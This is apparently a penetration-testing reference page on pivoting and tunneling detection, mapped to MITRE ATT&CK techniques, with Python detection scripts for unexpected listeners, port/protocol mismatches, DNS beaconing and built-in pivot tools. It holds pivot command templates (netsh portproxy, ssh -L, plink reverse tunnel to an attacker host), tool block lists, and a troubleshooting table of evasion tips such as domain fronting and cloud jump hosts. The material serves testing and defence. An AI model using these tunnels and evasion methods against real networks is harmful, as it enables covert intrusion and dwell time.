🛡️ Methodology Checklist
- Review MITRE ATT&CK: T1133, T1021, T1571, T1572, T1090 for context
- Baseline all expected listeners and ports before engagement starts
- Identify dual-homed hosts (potential bridges) in scope
- Confirm SIEM coverage for SSH on non-standard ports
- Verify DNS logging is in place for beaconing detection
- Review LOTL tool activity: plink.exe, netsh portproxy, PowerShell tunnels
- Document all pivot activity for client report appendix
🎯 Operational Context
Use when: Understanding what Blue Team can see when pivoting — select lower-detection tunneling methods for sensitive engagements. Think Dumber First: SSH tunnels look like normal SSH traffic (port 22, encrypted). Chisel over port 443 looks like HTTPS. ICMP/DNS tunnels are slower but bypass application-layer filtering. Know what generates alerts before choosing a method. Skip when: Lab environment with no monitoring — skip detection considerations and use the fastest method.
⚡ Tactical Cheatsheet
| Detection Method | What It Catches |
|---|---|
| Network baseline — track all listener ports | New listeners (Chisel, ssh -L, socat) appearing outside approved set |
| SIEM correlate SSH connections to non-standard ports | T1571 — SSH over port 443, 80, or 8080 |
| DNS query log analysis for rhythmic/beaconing patterns | T1572 — DNS tunneling via dnscat2/iodine |
| Netflow analysis for large data transfers on unexpected ports | C2 exfiltration and ICMP tunneling |
| EDR behavioral analysis for LOTL tools | PowerShell reverse tunnels, Plink.exe, netsh portproxy |
| Monitor for dual-homed host communication to new subnets | Pivot host bridging two segments |
| IDS/IPS protocol mismatch detection | HTTP traffic on port 25, SSH on port 80 |
| Endpoint: netstat / ss for unexpected listeners | Chisel, Rpivot, socat local forwards |
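The first and last rows of the table come down to the same control: know which sockets are supposed to be listening on each asset class and diff reality against that set. The script below is an added example (not code from the original cheatsheet): it parses `ss -lntup` output from a Linux host and reports any listener whose (protocol, port, process) triple is outside an approved baseline, so a Chisel or socat listener on a fresh port is caught, and so is an unknown process squatting on an approved port. The sample `ss` output and the `APPROVED` set are constructed for the example.

```python
"""Listener baseline audit (added example; not from the original cheatsheet).

Parses `ss -lntup` output and reports listeners missing from an approved
baseline. The sample output and the APPROVED set are constructed.
"""
import re
import subprocess
from dataclasses import dataclass
from typing import Iterable, Optional

# Constructed sample of `ss -lntup` output; no real host was queried.
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      511          0.0.0.0:443       0.0.0.0:*     users:(("nginx",pid=1203,fd=6))
tcp   LISTEN 0      4096         0.0.0.0:8080      0.0.0.0:*     users:(("chisel",pid=4412,fd=7))
tcp   LISTEN 0      128        127.0.0.1:1080      0.0.0.0:*     users:(("socat",pid=4420,fd=5))
udp   UNCONN 0      0            0.0.0.0:68        0.0.0.0:*     users:(("dhclient",pid=600,fd=6))
"""

# Approved baseline for this asset class (constructed): (proto, port, process).
APPROVED = {
    ("tcp", 22, "sshd"),
    ("tcp", 443, "nginx"),
    ("udp", 68, "dhclient"),
}


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    process: Optional[str]  # None when ss could not attribute the socket


# Netid State Recv-Q Send-Q Local:Port Peer:Port [users:(("name",pid=..,fd=..))]
_LINE_RE = re.compile(
    r'^(?P<proto>tcp|udp)\s+\S+\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+'
    r'(?:\s+users:\(\("(?P<proc>[^"]+)")?'
)


def parse_ss(output: str) -> list:
    listeners = []
    for line in output.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue  # header row or a line in an unexpected shape
        # rpartition handles IPv6 forms such as [::]:22 as well as 0.0.0.0:22
        addr, _, port = m.group("local").rpartition(":")
        listeners.append(Listener(m.group("proto"), addr, int(port), m.group("proc")))
    return listeners


def unexpected_listeners(listeners: Iterable[Listener], approved) -> list:
    """A listener is unexpected when its (proto, port, process) triple is not
    approved, so a known port served by an unknown process is reported too."""
    return [ln for ln in listeners if (ln.proto, ln.port, ln.process) not in approved]


def audit_live_host() -> list:
    """Run ss on the current Linux host and diff it against APPROVED."""
    out = subprocess.run(["ss", "-lntup"], capture_output=True, text=True, check=True).stdout
    return unexpected_listeners(parse_ss(out), APPROVED)


if __name__ == "__main__":
    for ln in unexpected_listeners(parse_ss(SAMPLE_SS_OUTPUT), APPROVED):
        print(f"UNEXPECTED {ln.proto}/{ln.port} bound to {ln.addr} by {ln.process}")
```

Keying the baseline on the process name as well as the port is deliberate: a tunnel tool bound to an already-approved port would otherwise pass. Run `audit_live_host()` from a scheduled job and ship its output to the SIEM to get the "new listener" alert the table describes.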
🔬 Deep Dive & Workflow
Blue Team Baseline Checklist
Quarterly audit minimum:
✓ DNS records — new/changed entries
✓ DHCP leases — unknown hosts
✓ Approved application inventory — flag unknown binaries
✓ Host map — all enterprise hosts located and accounted for
✓ Privileged users — who has elevated permissions
✓ Dual-homed hosts — machines with >1 NIC (potential pivot bridges)
✓ Netbrain/diagrams.net topology — visual baseline for anomaly spotting
MITRE ATT&CK Pivoting Techniques & Mitigations
T1133 — External Remote Services (VPN, Citrix, Web Gateways)
Attacker use: Access internal network via legitimate remote access services.
Detection:
- Log all VPN connection attempts including source IP/geo
- Alert on off-hours admin account logins
Mitigations:
- Segment environment from open internet via firewall
- Block internal protocols from outbound internet access
- Require VPN for service access (network location enforcement)
T1021 — Remote Services (SSH/RDP Lateral Movement)
Attacker use: Valid credentials for SSH/RDP to pivot between hosts.
Detection:
- SIEM: Alert on SSH connections from workstations (non-admin)
- SIEM: Alert on RDP sessions from unexpected source hosts
Mitigations:
- Enforce MFA on all remote access (SSH keys + TOTP)
- Expose infra ports (switches/routers) only to OOB management networks
- Host firewalls: limit RDP/SSH to authorized source subnets only
T1571 — Non-Standard Port Usage
Attacker use: Run C2/tunnels over port 443 or 8080 to evade port-based firewalls.
Detection:
- IDS/IPS: Alert on protocol mismatch (SSH traffic on port 443, DNS on port 53 but with unusual patterns)
- DPI (Deep Packet Inspection): Identify Chisel/Metasploit TLS patterns
Mitigations:
- Baseline which ports are "normal" for each asset class
- Block outbound connections to non-approved destination ports
- NIDS rules for common tunnel tool fingerprints
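The IDS/IPS "protocol mismatch" detection above reduces to a simple check: classify the first bytes a client sends and compare with what the destination port is supposed to carry. The following is an added example (not from the original page) of that check over constructed flow records: it recognises the SSH identification string, a TLS record header, HTTP request methods and SMTP greetings, and reports SSH on 443 or 80 and HTTP on 25, while deliberately staying silent on ports with no expectation or on payloads it cannot classify. The `EXPECTED_BY_PORT` table and the sample flows are constructed.

```python
"""Port/protocol mismatch check for T1571 (added example; not from the original page).

Classifies the first client payload bytes of a TCP flow by protocol prefix and
compares the result with the protocol expected on the destination port.
EXPECTED_BY_PORT and SAMPLE_FLOWS are constructed.
"""

# Protocol a defender expects on each port; extend per asset class (constructed).
EXPECTED_BY_PORT = {22: "ssh", 25: "smtp", 80: "http", 443: "tls", 8080: "http"}

_HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ", b"PATCH ")


def classify_payload(data: bytes) -> str:
    """Return 'ssh', 'tls', 'http', 'smtp' or 'unknown' from the first bytes."""
    if data.startswith(b"SSH-"):
        return "ssh"  # SSH identification string, sent by both peers (RFC 4253)
    # TLS record header: content type 0x16 (handshake), version 3.0 to 3.4
    if len(data) >= 3 and data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x04:
        return "tls"
    if data.startswith(_HTTP_METHODS):
        return "http"
    if data.startswith((b"EHLO ", b"HELO ", b"220 ")):
        return "smtp"
    return "unknown"


def find_mismatches(flows) -> list:
    """Return (src, dst, dport, expected, observed) for flows whose payload
    protocol differs from the port's expected protocol. Ports with no
    expectation and unrecognised payloads are skipped, not flagged, to keep
    the rule low-noise; pair it with egress filtering for the rest."""
    findings = []
    for flow in flows:
        expected = EXPECTED_BY_PORT.get(flow["dport"])
        observed = classify_payload(flow["payload"])
        if expected is None or observed == "unknown":
            continue
        if observed != expected:
            findings.append((flow["src"], flow["dst"], flow["dport"], expected, observed))
    return findings


# Constructed flows: first client payload bytes only, documentation-range IPs.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst": "203.0.113.10", "dport": 443, "payload": b"SSH-2.0-OpenSSH_9.3\r\n"},
    {"src": "10.0.0.6", "dst": "203.0.113.10", "dport": 443, "payload": b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0"},
    {"src": "10.0.0.7", "dst": "203.0.113.20", "dport": 25, "payload": b"GET /x HTTP/1.1\r\nHost: x\r\n\r\n"},
    {"src": "10.0.0.8", "dst": "203.0.113.30", "dport": 80, "payload": b"SSH-2.0-PuTTY_Release_0.80\r\n"},
    {"src": "10.0.0.9", "dst": "203.0.113.40", "dport": 9999, "payload": b"SSH-2.0-OpenSSH_9.3\r\n"},
    {"src": "10.0.0.10", "dst": "203.0.113.50", "dport": 80, "payload": b"GET / HTTP/1.1\r\nHost: www\r\n\r\n"},
]

if __name__ == "__main__":
    for src, dst, port, expected, observed in find_mismatches(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{port} expected {expected}, saw {observed}")
```

Note the limit this exposes: a tunnel that really is TLS on 443 (Chisel, for instance) classifies as "tls" and passes, which is exactly why the table pairs this rule with DPI or TLS inspection and with endpoint correlation.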
T1572 — Protocol Tunneling (SSH, DNS, ICMP, HTTP)
Attacker use:
- SSH dynamic (-D), local (-L), remote (-R) tunnels
- DNS tunneling (dnscat2, iodine)
- ICMP tunneling (ptunnel)
- HTTP CONNECT proxy
Detection:
- DNS: Alert on high query volume to single external domain (dnscat beacon)
- DNS: Alert on unusually long TXT/NULL query responses
- ICMP: Alert on ICMP payloads with non-standard sizes or rhythmic timing
- SSH: Alert on ssh processes with -D/-L/-R flags from non-admin users
Mitigations:
- Strict egress filtering: deny outbound except approved business ports
- DNS lockdown: internal hosts must use internal DNS server only (no direct external)
- Analyze beaconing: rhythmic traffic patterns = C2 heartbeat
- Rate limit ICMP responses
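The DNS detections listed above (volume to one domain, long TXT/NULL answers, rhythmic timing) can be computed from nothing more than a resolver query log. The script below is an added example, not code from the original page: it groups queries by client and registered domain, measures how regular the spacing between queries is (a coefficient of variation near zero is a heartbeat), flags long TXT/NULL answers, and, going one step beyond the text, also flags the case where every query in the group used a different subdomain label, which is how dnscat2 and iodine carry data upstream. The log format, thresholds and `registered_domain` heuristic are constructed assumptions; `parse_log` is the one function to adapt to a real resolver's format.

```python
"""DNS tunnel / beacon heuristics for T1572 (added example; not from the original page).

Works on a constructed query-log format (timestamp, client, qname, qtype,
answer bytes). parse_log is the only part to adapt for a real resolver log.
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample log; one query per line. 10.0.0.12 queries a fresh label
# under c2.example.net every 30 s and gets ~500-byte TXT answers back.
SAMPLE_LOG = """\
2024-03-01T10:00:00 10.0.0.5 www.example.com A 60
2024-03-01T10:00:00 10.0.0.12 6a8b1f.c2.example.net TXT 512
2024-03-01T10:00:07 10.0.0.5 mail.example.com A 60
2024-03-01T10:00:30 10.0.0.12 9c0d2e.c2.example.net TXT 498
2024-03-01T10:01:00 10.0.0.12 3f4a5b.c2.example.net TXT 505
2024-03-01T10:01:30 10.0.0.12 7e8f9a.c2.example.net TXT 511
2024-03-01T10:02:00 10.0.0.12 1b2c3d.c2.example.net TXT 500
2024-03-01T10:02:11 10.0.0.5 cdn.example.com A 76
2024-03-01T10:02:30 10.0.0.12 4d5e6f.c2.example.net TXT 509
2024-03-01T10:03:00 10.0.0.12 8a9b0c.c2.example.net TXT 503
2024-03-01T10:03:30 10.0.0.12 2d3e4f.c2.example.net TXT 497
2024-03-01T10:03:45 10.0.0.5 www.example.com A 60
"""


def parse_log(text: str) -> list:
    """Adapter for the constructed format: (ts, client, qname, qtype, answer_len)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype, answer_len = line.split()
        events.append((datetime.fromisoformat(ts), client,
                       qname.rstrip(".").lower(), qtype.upper(), int(answer_len)))
    return events


def registered_domain(qname: str) -> str:
    """Last two labels. A production version should use the Public Suffix List."""
    return ".".join(qname.split(".")[-2:])


def analyze(events, min_queries=6, max_cv=0.2, long_answer=300) -> list:
    """Return (client, domain, reasons) for client/domain pairs that look like tunnels."""
    groups = defaultdict(list)
    for ts, client, qname, qtype, answer_len in events:
        groups[(client, registered_domain(qname))].append((ts, qname, qtype, answer_len))

    findings = []
    for (client, domain), queries in groups.items():
        queries.sort()  # by timestamp
        reasons = []
        if len(queries) >= min_queries:
            gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(queries, queries[1:])]
            mean_gap = statistics.mean(gaps)
            # Coefficient of variation near 0 means near-constant spacing: a heartbeat.
            if mean_gap > 0 and statistics.pstdev(gaps) / mean_gap <= max_cv:
                reasons.append(f"rhythmic: {len(queries)} queries, mean gap {mean_gap:.0f}s")
            if len({q[1] for q in queries}) == len(queries):
                reasons.append("every query used a unique subdomain (data encoded in labels)")
        long_answers = [q for q in queries if q[2] in ("TXT", "NULL") and q[3] >= long_answer]
        if long_answers:
            reasons.append(f"{len(long_answers)} TXT/NULL answers of {long_answer}+ bytes")
        if reasons:
            findings.append((client, domain, reasons))
    return findings


if __name__ == "__main__":
    for client, domain, reasons in analyze(parse_log(SAMPLE_LOG)):
        print(f"{client} -> {domain}: " + "; ".join(reasons))
```

The same inter-arrival test applies unchanged to ICMP echo timestamps per source/destination pair, which is the "rhythmic timing" ICMP detection above. Tune `max_cv` upward if the beacon tool adds jitter, and pair the rule with the "internal DNS only" mitigation so all queries actually pass the logging resolver.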
T1090 — Proxy Use (Proxychains)
Attacker use: Chain connections through SOCKS proxy to hide true source IP.
Detection:
- Netflow: Internal host making connections through another internal host (proxy chain)
- Source IP analysis: same session arriving from multiple internal hops
Mitigations:
- Allow/block lists for outbound destination IPs
- Netflow analysis: requires baselining normal inter-host traffic
- Zero Trust: verify identity at each hop, not just perimeter
Living Off The Land (LOTL) — Built-in Pivot Tools
Attacker use: Use Windows/Linux built-in tools to avoid dropping binaries.
netsh portproxy add v4tov4 localport=8080 connectaddress=[DEST] connectport=8080
ssh -L [LOCAL_PORT]:[DEST_IP]:[DEST_PORT] user@pivot
plink.exe -R [LPORT]:[LHOST]:[LPORT] user@[ATTACKER]
Detection:
- EDR: Alert on netsh portproxy changes
- Process monitoring: plink.exe, nc.exe, ncat.exe from non-admin context
- Behavioral: receptionist running PowerShell = anomaly
Mitigations:
- EDR/AV tuned and active on all endpoints
- SIEM log correlation: combine endpoint + network logs
- Application allowlisting (AppLocker/WDAC) to block unauthorized binaries
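The LOTL detections above (netsh portproxy changes, plink/nc/ncat from a non-admin context, ssh -D/-L/-R from non-admin users, PowerShell where the user's role makes it anomalous) are process-level rules, so they belong in the EDR or in a SIEM rule over process-creation events. The code below is an added example, not code from the original page: it runs those four rules over constructed process events normalised to (host, user, role, image, command line). The role taxonomy, the hosts and the events are constructed; the ssh rule is case-sensitive on purpose, because lowercase `-l` is the login-name option and must not trigger.

```python
"""Endpoint rules for built-in pivot tooling (added example; not from the original page).

Runs over constructed process-creation events (the shape an EDR or Sysmon
event is normalised into) and flags the LOTL patterns listed above.
Role names, hosts and events are constructed.
"""
TUNNEL_BINARIES = {"plink.exe", "nc.exe", "ncat.exe", "nc", "ncat", "socat", "chisel", "chisel.exe"}
NON_TECHNICAL_ROLES = {"reception", "hr", "finance"}  # constructed role taxonomy
PORTPROXY_VERBS = {"add", "delete", "set", "reset"}


def _basename(image: str) -> str:
    """Last path component for Windows or POSIX paths, lower-cased."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the list of rule names this single event trips (empty if none)."""
    image = _basename(event["image"])
    tokens = event["cmdline"].split()
    hits = []

    if image in TUNNEL_BINARIES:
        hits.append("tunnel-capable binary executed")

    # ssh -D/-L/-R from a non-admin. Case-sensitive: lowercase -l is the
    # login-name option. startswith also catches the joined form (-D1080).
    if image in {"ssh", "ssh.exe"} and event["role"] != "admin":
        if any(t.startswith(("-D", "-L", "-R")) for t in tokens[1:]):
            hits.append("ssh port-forwarding flag from non-admin user")

    # Any netsh portproxy change, whether or not 'interface' is spelled out.
    if image == "netsh.exe" and "portproxy" in tokens and PORTPROXY_VERBS & set(tokens):
        hits.append("netsh portproxy change")

    if image in {"powershell.exe", "pwsh.exe"} and event["role"] in NON_TECHNICAL_ROLES:
        hits.append("PowerShell launched by non-technical role")

    return hits


def scan(events) -> list:
    """Flatten to (event id, rule name) pairs, in event order."""
    return [(e["id"], hit) for e in events for hit in evaluate(e)]


# Constructed events; documentation-range IPs, invented hosts and users.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-RECEPTION-01", "user": "jdoe", "role": "reception",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile"},
    {"id": 2, "host": "WS-RECEPTION-01", "user": "jdoe", "role": "reception",
     "image": r"C:\Users\jdoe\Downloads\plink.exe",
     "cmdline": "plink.exe -R 8443:127.0.0.1:3389 user@198.51.100.7"},
    {"id": 3, "host": "SRV-JUMP-02", "user": "a-smith", "role": "admin",
     "image": "/usr/bin/ssh",
     "cmdline": "ssh -L 8080:10.10.20.5:80 bastion"},
    {"id": 4, "host": "WS-0042", "user": "jdoe", "role": "reception",
     "image": "/usr/bin/ssh",
     "cmdline": "ssh -l jdoe files.corp.example"},
    {"id": 5, "host": "WS-0042", "user": "bwong", "role": "developer",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -D1080 dev@build01"},
    {"id": 6, "host": "WS-0042", "user": "bwong", "role": "developer",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=8080 connectaddress=10.10.20.5 connectport=8080"},
    {"id": 7, "host": "WS-0042", "user": "bwong", "role": "developer",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh interface show interface"},
]

if __name__ == "__main__":
    for event_id, hit in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {hit}")
```

Event 3 is the intended negative case: an admin forwarding a port from a jump host is business as usual and the rule stays quiet, which is what keeps it usable. The real work is in the role lookup; if the identity system cannot answer "what does this account do", the PowerShell rule degrades to noise.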
Defense Quick Reference
People:
- MFA everywhere, especially admin accounts
- Security operations for IR and SOC monitoring
Process:
- Asset management (tag/inventory/monitor all hosts)
- Formal access provisioning/de-provisioning
- Change management: who/what/when
Technology:
- Segment production from management networks
- Host-based (HIDS) + Network-based (NIDS) IDS/IPS
- SIEM for log correlation (event + network)
- Least privilege: HR ≠ switch admin access
- Audit legacy misconfigurations regularly
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Tunnel immediately detected | IDS signature match | Switch to more common protocol (HTTPS); avoid known C2 ports (4444, 8888) |
| DNS tunnel too slow | High latency in DNS | DNS tunneling is ~1-3KB/s — only viable for command-and-control, not data transfer |
| ICMP tunnel blocked | ICMP rate-limited or filtered | Use DNS or HTTP tunnel; ICMP is often rate-limited by perimeter devices |
| Chisel traffic detected | TLS inspection | Use domain-fronted CDN or legitimate cloud service for Chisel server to blend traffic |
| SSH tunnel detected by source IP | Known attack box IP in SIEM | Use cloud VM as jump; attacker IP never touches internal network directly |
📝 Reporting Trigger
Finding Title: Encrypted Pivot Tunnel Evades Network Detection Controls
Impact: Pivot tunnel encrypted over standard ports (443/22) is indistinguishable from legitimate HTTPS/SSH traffic at the network level, allowing extended dwell time in the internal network without triggering network-based IDS/IPS alerts.
Root Cause: Network monitoring limited to unencrypted protocols or known-bad signatures. No endpoint monitoring to correlate process behavior with network connections.
Recommendation: Implement SSL/TLS inspection for non-browser outbound traffic. Deploy EDR to correlate process-level network activity with established tunnels. Network behavioral analytics to detect unusual traffic patterns regardless of encryption.